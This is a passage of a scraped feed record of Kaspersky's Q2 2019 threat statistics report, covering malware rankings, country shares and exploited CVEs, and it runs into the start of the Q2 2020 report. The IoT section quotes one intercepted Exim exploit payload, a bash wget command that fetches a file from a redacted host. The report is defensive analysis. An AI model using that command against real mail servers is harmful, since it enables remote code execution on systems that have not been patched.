AdWare.OSX.Cimpli.d | 5.76 \n10 | AdWare.OSX.Mcp.a | 5.39 \n11 | AdWare.OSX.Agent.b | 5.11 \n12 | AdWare.OSX.Pirrit.q | 4.31 \n13 | AdWare.OSX.Bnodlero.v | 4.02 \n14 | AdWare.OSX.Bnodlero.q | 3.70 \n15 | AdWare.OSX.MacSearch.d | 3.66 \n16 | Downloader.OSX.InstallCore.ab | 3.58 \n17 | AdWare.OSX.Geonei.as | 3.48 \n18 | AdWare.OSX.Amc.a | 3.29 \n19 | AdWare.OSX.Agent.c | 2.93 \n20 | AdWare.OSX.Mhp.a | 2.90 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS that were attacked._\n\nOn the topic of most common threats in Q2, the Shlayer.a Trojan (24.61%) retained top spot. In second place is the adware app AdWare.OSX.Spc.a (12.75%) and in third AdWare.OSX.Bnodlero.t (11.98%), which pushed AdWare.OSX.Pirrit.j (11.27%) into fourth. Like last quarter, most of the Top 20 places went to adware apps. 
Among them, members of the Pirrit family were particularly prominent: five positions out of 20.\n\n### Threat geography\n\n| Country* | %** \n---|---|--- \n1 | France | 11.11 \n2 | Spain | 9.68 \n3 | India | 8.84 \n4 | US | 8.49 \n5 | Canada | 8.35 \n6 | Russia | 8.01 \n7 | Italy | 7.74 \n8 | UK | 7.47 \n9 | Mexico | 7.08 \n10 | Brazil | 6.85 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)_ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn terms of the geographical spread of macOS threats, France (11.11%), Spain (9.68%), and India (8.84%) retained their leadership.\n\nIn the US (8.49%), Canada (8.35%), and Russia (8.01%), the share of infected users increased, ranking these countries respectively fourth, fifth, and sixth in our Top 10.\n\n## IoT attacks\n\n### Interesting events\n\nIn the world of Linux/Unix threats, the most significant event was the active rise in the number of attacks exploiting a new [vulnerability](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>) in the EXIM mail transfer agent. In a nutshell, the attacker creates a special email and fills the recipient field with code to be executed on the vulnerable target mail server. The message is then sent using this server. EXIM processes the sent message and executes the code in the recipient field.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153528/it-threat-evolution-q2-2019-statistics-10.png>)\n\n_Intercepted attack traffic_\n\nThe screenshot shows a message whose RCPT field contains the shell script. The latter actually looks as follows: \n \n \n /bin/bash -c \"wget X.X.X.X/exm -O /dev/null\n\n### IoT threat statistics\n\nQ2 2019 demonstrated a significant drop in attacks via telnet: around 60% versus 80% in Q1. 
The assumption is that cybercriminals are gradually switching to more productive hardware enabling the use of SSH. \n \nSSH | 40.43% \nTelnet | 59.57% \n \n_Distribution of attacked services by number of unique IP addresses of attacking devices, Q2 2019_\n\nHowever, in terms of number of sessions involving Kaspersky Lab [honeypots](<https://encyclopedia.kaspersky.com/glossary/honeypot-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), we see a decline for SSH from 64% in Q1 to 49.6% in Q2. \n \nSSH | 49.59% \nTelnet | 50.41% \n \n_Distribution of cybercriminals' working sessions with Kaspersky Lab traps, Q2 2019_\n\n### Telnet-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab telnet traps, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153555/it-threat-evolution-q2-2019-statistics-11.png>)\n\n#### **Top 10 countries by location of devices from which telnet-based attacks were carried out on Kaspersky Lab traps**\n\n| Country | % \n---|---|--- \n1 | Egypt | 15.06 \n2 | China | 12.27 \n3 | Brazil | 10.24 \n4 | US | 5.23 \n5 | Russia | 5.03 \n6 | Greece | 4.54 \n7 | Iran | 4.06 \n8 | Taiwan | 3.15 \n9 | India | 3.04 \n10 | Turkey | 2.90 \n \nFor the second quarter in a row, Egypt (15.06%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab traps. 
Second place, by a small margin, went to China (12.27%), with Brazil (10.24%) in third.\n\nTelnet-based attacks most often used a member of the infamous Mirai malware family as ammunition.\n\n#### **Top 10 malware downloaded to infected IoT devices via successful telnet-based attacks **\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 38.92 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 26.48 \n3 | Backdoor.Linux.Mirai.ba | 26.48 \n4 | Backdoor.Linux.Mirai.au | 15.75 \n5 | Backdoor.Linux.Gafgyt.bj | 2.70 \n6 | Backdoor.Linux.Mirai.ad | 2.57 \n7 | Backdoor.Linux.Gafgyt.az | 2.45 \n8 | Backdoor.Linux.Mirai.h | 1.38 \n9 | Backdoor.Linux.Mirai.c | 1.36 \n10 | Backdoor.Linux.Gafgyt.av | 1.26 \n \n_* Share of malware type in the total amount of malware downloaded to IoT devices via successful telnet attacks_\n\nAs things stand, there is no reason to expect a change in the situation with Mirai, which remains the most popular malware family with cybercriminals attacking IoT devices.\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab SSH traps, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153622/it-threat-evolution-q2-2019-statistics-12.png>)\n\n#### **Top 10 countries by location of devices from which attacks were made on Kaspersky Lab SSH traps**\n\n| Country | % \n---|---|--- \n1 | Vietnam | 15.85 \n2 | China | 14.51 \n3 | Egypt | 12.17 \n4 | Brazil | 6.91 \n5 | Russia | 6.66 \n6 | US | 5.05 \n7 | Thailand | 3.76 \n8 | Azerbaijan | 3.62 \n9 | India | 2.43 \n10 | France | 2.12 \n \nIn Q2 2019, the Top 3 countries by number of devices attacking Kaspersky Lab traps using the SSH protocol were Vietnam (15.85%), China (14.51%), and Egypt (12.17%). 
The US (5.05%), which took second place in Q1 2019, dropped down to seventh.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q2 2019, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 228,206 users.\n\n_Number of unique users attacked by financial malware, Q2 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153645/it-threat-evolution-q2-2019-statistics-13.png>)\n\n### Attack geography\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153713/it-threat-evolution-q2-2019-statistics-14.png>)\n\n#### Top 10 countries by share of attacked users\n\n| **Country*** | **%**** \n---|---|--- \n1 | Belarus | 2.0 \n2 | Venezuela | 1.8 \n3 | China | 1.6 \n4 | Indonesia | 1.3 \n5 | South Korea | 1.3 \n6 | Cyprus | 1.2 \n7 | Paraguay | 1.2 \n8 | Russia | 1.2 \n9 | Cameroon | 1.1 \n10 | Serbia | 1.1 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n#### Top 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | RTM | Trojan-Banker.Win32.RTM | 32.2 | \n2 | Zbot | Trojan.Win32.Zbot | 23.3 | \n3 | Emotet | Backdoor.Win32.Emotet | 8.2 | \n4 | Nimnul | Virus.Win32.Nimnul | 6.4 | \n5 | Trickster | Trojan.Win32.Trickster | 5.0 | \n6 | Nymaim | Trojan.Win32.Nymaim | 3.5 | \n7 | SpyEye | Backdoor.Win32.SpyEye | 3.2 | \n8 | Neurevt | Trojan.Win32.Neurevt | 2.8 | 
\n9 | IcedID | Trojan-Banker.Win32.IcedID | 1.2 | \n10 | Gozi | Trojan.Win32.Gozi | 1.1 | \n \n_** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q2 2019, the Top 3 remained unchanged compared to the previous quarter. The leading positions in our Top 10, by a clear margin, went to the Trojan-Banker.Win32.RTM (32.2%) and Trojan.Win32.Zbot (23.3%) families. Their shares rose by 4.8 and 0.4 p.p. respectively. Behind them came the Backdoor.Win32.Emotet family (8.2%); its share, conversely, fell by 1.1 p.p. From the beginning of June, we noted a decrease in the activity of Emotet C&C servers, and by early Q3 almost all the C&C botnets were unavailable.\n\nWe also observe that in Q2 Trojan-Banker.Win32.IcedID (1.2%) and Trojan.Win32.Gozi (1.1%) appeared in the Top 10 families. They took ninth and tenth places, respectively.\n\n## Ransomware programs\n\n### Quarterly highlights\n\nAfter almost 18 months of active distribution, the team behind the GandCrab ransomware announced it was [shutting down the operation](<https://threatpost.com/gandcrab-ransomware-shutters/145267/>). According to our reports, it was one of the most common ransomware encryptors.\n\nIn Q2, distribution got underway of the new [Sodin](<https://securelist.com/sodin-ransomware/91473/>) ransomware (aka Sodinokibi or REvil), which was noteworthy for several reasons. There was the distribution method through hacking vulnerable servers, plus the use of a rare LPE exploit, not to mention the complex cryptographic scheme.\n\nAlso this quarter, there were a few high-profile ransomware infections in the computer networks of [city](<https://threatpost.com/ransomware-florida-city-pays-600k-ransom/145869/>) [administrations](<https://threatpost.com/second-florida-city-pays-hackers-500k-post-ransomware-attack/146018/>). This is not a new trend, since hacking corporate or municipal networks for extortion purposes is common enough. 
However, the mass nature of such incidents in recent years draws attention to the security of critical computer infrastructure, on which not only individual organizations but entire communities rely.\n\n### Number of new modifications\n\nIn Q2 2019, we identified eight new families of ransomware Trojans and detected 16,017 new modifications of these malware types. For comparison, Q1 saw 5,222 new modifications, three times fewer.\n\n_Number of new ransomware modifications, Q2 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153736/it-threat-evolution-q2-2019-statistics-15.png>)\n\nThe majority of new modifications belonged to the Trojan-Ransom.Win32.Gen family (various Trojans are automatically detected as such based on behavioral rules), as well as Trojan-Ransom.Win32.PolyRansom. The large number of PolyRansom modifications was due to the nature of this malware \u2013 it is a worm that creates numerous mutations of its own body. It substitutes these modified copies for user files, and places the victim's data inside them in encrypted form.\n\n### Number of users attacked by ransomware Trojans\n\nIn Q2 2019, Kaspersky products defeated ransomware attacks against 232,292 unique KSN users. This is 50,000+ fewer than the previous quarter.\n\n_Number of unique users attacked by ransomware Trojans, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153800/it-threat-evolution-q2-2019-statistics-16.png>)\n\nThe busiest month for protecting attacked users was April (107,653); this is even higher than the figure for March (106,519), which marks a continuation of the upward trend seen in Q1. 
However, in May the number of attacked users began to fall, and in June they amounted to a little over 82,000.\n\n### Attack geography\n\n_Geographical spread of countries by share of users attacked by ransomware Trojans, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153826/it-threat-evolution-q2-2019-statistics-17.png>)\n\n#### Top 10 countries attacked by ransomware Trojans\n\n| **Country*** | **% of users attacked by ransomware**** \n---|---|--- \n1 | Bangladesh | 8.81% \n2 | Uzbekistan | 5.52% \n3 | Mozambique | 4.15% \n4 | Ethiopia | 2.42% \n5 | Nepal | 2.26% \n6 | Afghanistan | 1.50% \n7 | China | 1.18% \n8 | Ghana | 1.17% \n9 | Korea | 1.07% \n10 | Kazakhstan | 1.06% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by Trojan encryptors as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdict*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 23.37% | \n2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 18.73% | \n3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 13.83% | \n4 | (generic verdict) | Trojan-Ransom.Win32.Gen | 7.41% | \n5 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 4.73% | \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 4.15% | \n7 | Shade | Trojan-Ransom.Win32.Shade | 2.75% | \n8 | PolyRansom/VirLock | Virus.Win32.PolyRansom \nTrojan-Ransom.Win32.PolyRansom | 2.45% | \n9 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 1.31% | \n10 | Cryakl | Trojan-Ransom.Win32.Cryakl | 1.24% | \n| | | | | \n \n_* Statistics are based on detection verdicts of Kaspersky products. 
The information was provided by Kaspersky product users who consented to provide statistical data._ \n_** Unique Kaspersky users attacked by a particular family of ransomware Trojans as a percentage of all users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new modifications\n\nIn Q2 2019, Kaspersky solutions detected 7,156 new modifications of miners, almost 5,000 fewer than in Q1.\n\n_Number of new miner modifications, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153850/it-threat-evolution-q2-2019-statistics-18.png>)\n\nThe largest number of new modifications was detected in April (3,101). This is also nearly 1,000 more than in March 2019, but, on average, new miner modifications are appearing less and less.\n\n### Number of users attacked by miners\n\nIn Q2, we detected attacks using miners on the computers of 749,766 unique users of Kaspersky products worldwide.\n\n_Number of unique users attacked by miners, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153917/it-threat-evolution-q2-2019-statistics-19.png>)\n\nThroughout the quarter, the number of attacked users gradually decreased \u2013 from 383,000 in April to 318,000 in June.\n\n### Attack geography\n\n_Geographical spread of countries by share of users attacked by miners, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153944/it-threat-evolution-q2-2019-statistics-20.png>)\n\n**Top 10 countries by share of users attacked by miners**\n\n| | **Country*** | **% of users attacked by miners**** \n---|---|--- \n1 | Afghanistan | 10.77% \n2 | Ethiopia | 8.99% \n3 | Uzbekistan | 6.83% \n4 | Kazakhstan | 4.76% \n5 | Tanzania | 4.66% \n6 | Vietnam | 4.28% \n7 | Mozambique | 3.97% \n8 | Ukraine | 3.08% \n9 | Belarus | 3.06% \n10 | Mongolia | 3.06% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique 
users whose computers were attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyber attacks\n\nOver the past year, the Microsoft Office suite has topped our breakdown of the most attacked applications. Q2 2019 was no exception \u2013 the share of exploits for vulnerabilities in Microsoft Office applications rose from 67% to 72%. The reason for the growth was primarily the incessant mass spam mailings distributing documents with exploits for the [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), [CVE-2018-0798](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0798>), and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) vulnerabilities. These vulnerabilities exploit stack overflow due to bugs in object processing to remotely execute code for the Equation Editor component in Microsoft Office. Other Office vulnerabilities such as [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>) and [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>) are also popular with cybercriminals.\n\nThe increasing popularity of exploits for Microsoft Office suggests that cybercriminals see it as the easiest and fastest way to deploy malware on victim computers. 
In other words, these exploits are more likely to succeed, since their format enables the use of various techniques for bypassing static detection tools, and their execution is hidden from users and requires no additional actions, such as running macros.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154007/it-threat-evolution-q2-2019-statistics-21.png>)\n\nThe share of detected exploits for vulnerabilities in different web browsers in Q2 amounted to 14%, five times less than the share of exploits for Microsoft Office. Most browser vulnerabilities are the result of errors in just-in-time code compilation, as well as during various stages of code optimization, since the logic of these processes is complex and demands special attention from developers. Insufficient checks for potential modification of data or data types during such processing, when it is not expected by the compiler/optimizer, often give rise to new vulnerabilities. Other common errors that can lead to remote code execution in web browsers are data type overflow, freed memory usage, and incorrect use of types. Perhaps the most interesting example this quarter was a zero-day exploit targeted at employees of [Coinbase](<https://www.zdnet.com/article/firefox-zero-day-was-used-in-attack-against-coinbase-employees-not-its-users/>) and a number of other organizations. Found in the wild, it utilized two vulnerabilities at once, [CVE-2019-11707](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-18/>) and [CVE-2019-11708](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-19/>), for remote code execution in Mozilla Firefox.\n\nOn the topic of zero-days, the release in Q2 of exploit code by a security researcher under the pseudonym SandboxEscaper is worth noting. 
The set of exploits, named PolarBear, elevates privileges under Windows 10 and targets the following vulnerabilities: [CVE-2019-1069](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1069>), [CVE-2019-0863](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0863>), [CVE-2019-0841](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0841>), and [CVE-2019-0973](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0973>).\n\nThe share of network attacks continued to grow in Q2. Cybercriminals did not abandon EternalBlue-based attacks on systems with an unpatched SMB subsystem, and were active in bringing new vulnerabilities on stream in network applications such as [Oracle WebLogic](<https://securelist.com/sodin-ransomware/91473/>). A separate note goes to the ongoing password attacks on Remote Desktop Protocol and Microsoft SQL Server. However, the greatest danger for many users came from the [CVE-2019-0708](<https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>) vulnerability, found in Q2, in the remote desktop subsystem for Windows XP, Windows 7, and Windows Server 2008. It can be used by cybercriminals to gain remote control over vulnerable computers, and create a network worm not unlike the [WannaCry ransomware](<https://securelist.com/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/78351/>). Insufficient validation of incoming packets allows an attacker to trigger a use-after-free and overwrite data in kernel memory. 
Note that exploiting this vulnerability does not require access to a remote account, as exploitation takes place at the authorization stage, before the username and password are checked.\n\n### Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n#### Countries that are sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q2 2019, Kaspersky solutions defeated **717,057,912** attacks launched from online resources located in 203 countries across the globe. **217,843,293** unique URLs triggered Web Anti-Virus components.\n\n_Distribution of web-based attack sources by country, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154032/it-threat-evolution-q2-2019-statistics-22.png>)\n\nThis quarter, Web Anti-Virus was most active on resources located in the US. 
Overall, the Top 4 remained unchanged from the previous quarter.\n\n#### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious objects that fall under the Malware class; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| | Country* | % of attacked users** \n---|---|--- \n1 | Algeria | 20.38 \n2 | Venezuela | 19.13 \n3 | Albania | 18.30 \n4 | Greece | 17.36 \n5 | Moldova | 17.30 \n6 | Bangladesh | 16.82 \n7 | Estonia | 16.68 \n8 | Azerbaijan | 16.59 \n9 | Belarus | 16.46 \n10 | Ukraine | 16.18 \n11 | France | 15.84 \n12 | Philippines | 15.46 \n13 | Armenia | 15.40 \n14 | Tunisia | 15.29 \n15 | Bulgaria | 14.73 \n16 | Poland | 14.69 \n17 | R\u00e9union | 14.68 \n18 | Latvia | 14.65 \n19 | Peru | 14.50 \n20 | Qatar | 14.32 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average, 12.12% of Internet user computers worldwide experienced at least one Malware-class attack during the quarter.\n\n_Geography of malicious web-based attacks, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154059/it-threat-evolution-q2-2019-statistics-23.png>)\n\n### Local threats\n\n_Statistics on local 
infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q2 2019, our File Anti-Virus detected **240,754,063** malicious and potentially unwanted objects.\n\n#### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that as of this quarter, the rating includes only **Malware-class** attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| | Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 55.43 \n2 | Tajikistan | 55.27 \n3 | Uzbekistan | 55.03 \n4 | Yemen | 52.12 \n5 | Turkmenistan | 50.75 \n6 | Laos | 46.12 \n7 | Syria | 46.00 \n8 | Myanmar | 45.61 \n9 | Mongolia | 45.59 \n10 | Ethiopia | 44.95 \n11 | Bangladesh | 44.11 \n12 | Iraq | 43.79 \n13 | China | 43.60 \n14 | Bolivia | 43.47 \n15 | Vietnam | 43.22 \n16 | Venezuela | 42.71 \n17 | Algeria | 42.33 \n18 | Cuba | 42.31 \n19 | Mozambique | 42.14 \n20 | Rwanda | 42.02 \n \n_These statistics are based on detection verdicts returned by the OAS and ODS Anti-Virus modules received from users of Kaspersky products who consented to provide statistical data. 
The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera memory cards, phones, or external hard drives._\n\n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local threats, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154126/it-threat-evolution-q2-2019-statistics-24.png>)\n\nOverall, 22.35% of user computers globally faced at least one **Malware-class** local threat during Q2.\n\nThe figure for Russia was 26.14%.", "cvss3": {}, "published": "2019-08-19T10:00:00", "type": "securelist", "title": "IT threat evolution Q2 2019. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0798", "CVE-2018-0802", "CVE-2019-0708", "CVE-2019-0841", "CVE-2019-0863", "CVE-2019-0973", "CVE-2019-10149", "CVE-2019-1069", "CVE-2019-11707", "CVE-2019-11708"], "modified": "2019-08-19T10:00:00", "id": "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "href": "https://securelist.com/it-threat-evolution-q2-2019-statistics/92053/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-03T13:05:29", "description": "\n\n**[IT threat evolution Q2 2020. Review](<https://securelist.com/it-threat-evolution-q2-2020/98230/>) \n[IT threat evolution Q2 2020. 
Mobile statistics](<https://securelist.com/it-threat-evolution-q2-2020-mobile-statistics/98337/>)**\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q2:\n\n * Kaspersky solutions blocked 899,744,810 attacks launched from online resources in 191 countries across the globe.\n * As many as 286,229,445 unique URLs triggered Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 181,725 unique users.\n * Ransomware attacks were defeated on the computers of 154,720 unique users.\n * Our File Anti-Virus detected 80,993,511 unique malware and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q2 2020, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 181,725 users.\n\n_Number of unique users attacked by financial malware, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105102/16-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Geography of attacks**\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of financial malware attacks, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105134/17-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| | **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 7.5 \n2 | Uzbekistan | 5.7 \n3 | Tajikistan | 5.6 \n4 | Afghanistan | 2.6 \n5 | Macedonia | 2.6 \n6 | Yemen | 2.2 \n7 
| Syria | 1.9 \n8 | Kazakhstan | 1.7 \n9 | Cyprus | 1.7 \n10 | Iran | 1.5 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000). \n** Unique users of Kaspersky products whose computers were targeted by financial malware as a share of all unique users of Kaspersky products in the country._\n\nAmong the banking Trojan families, the share of Backdoor.Win32.Emotet decreased markedly from 21.3% to 6.6%. This botnet's activity decreased at the end of Q1 2020, but the results only became clear in the second quarter. However, as we prepared this report, we noticed that Emotet was gradually recovering.\n\n**Top 10 banking malware families**\n\n| | Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 24.8 | \n2 | RTM | Trojan-Banker.Win32.RTM | 18.6 | \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 15.4 | \n4 | Emotet | Backdoor.Win32.Emotet | 6.6 | \n5 | Trickster | Trojan.Win32.Trickster | 4.7 | \n6 | Nimnul | Virus.Win32.Nimnul | 4.3 | \n7 | Danabot | Trojan-Banker.Win32.Danabot | 3.4 | \n8 | SpyEye | Trojan-Spy.Win32.SpyEye | 3.0 | \n9 | Nymaim | Trojan.Win32.Nymaim | 2.5 | \n10 | Neurevt | Trojan.Win32.Neurevt | 1.4 | \n \n_* Unique users attacked by this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trend highlights\n\nThe attackers behind the Shade ransomware announced that they had ceased to distribute the Trojan. In addition, they published keys to decrypt files affected by all of its versions. The number of keys that had been accumulated over the years exceeded 750,000, and we [updated](<https://www.kaspersky.com/blog/shade-decryptor-2020/35246/>) our ShadeDecryptor utility to help Shade victims to regain access to their data.\n\nRansomware written in Go began surfacing more often than before. Examples of recently discovered Trojans include Sorena, Smaug, Hydra, Satan/M0rphine, etc. 
What is this: hackers showing an interest in new technology, ease of development or an attempt at making researchers' work harder? No one knows for sure.\n\n### Number of new modifications\n\nWe detected five new ransomware families and 4,406 new modifications of these malware programs in Q2 2020.\n\n_Number of new ransomware modifications detected, Q2 2019 \u2013 Q1 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105223/sl_malware_q2_pc_03_18-malware_q2-2020_stats_non-mobile.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nKaspersky products and technologies protected 154,720 users from ransomware attacks in Q2 2020.\n\n_Number of unique users attacked by ransomware Trojans, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105258/19-en-malware_q2-2020_stats_non-mobile.png>))_\n\n### Geography of attacks\n\n_Geography of attacks by ransomware Trojans, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105418/20-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| | **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.69% \n2 | Mozambique | 1.16% \n3 | Uzbekistan | 1.14% \n4 | Egypt | 0.97% \n5 | Ethiopia | 0.94% \n6 | China | 0.74% \n7 | Afghanistan | 0.67% \n8 | Pakistan | 0.57% \n9 | Vietnam | 0.55% \n10 | Mongolia | 0.49% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000). 
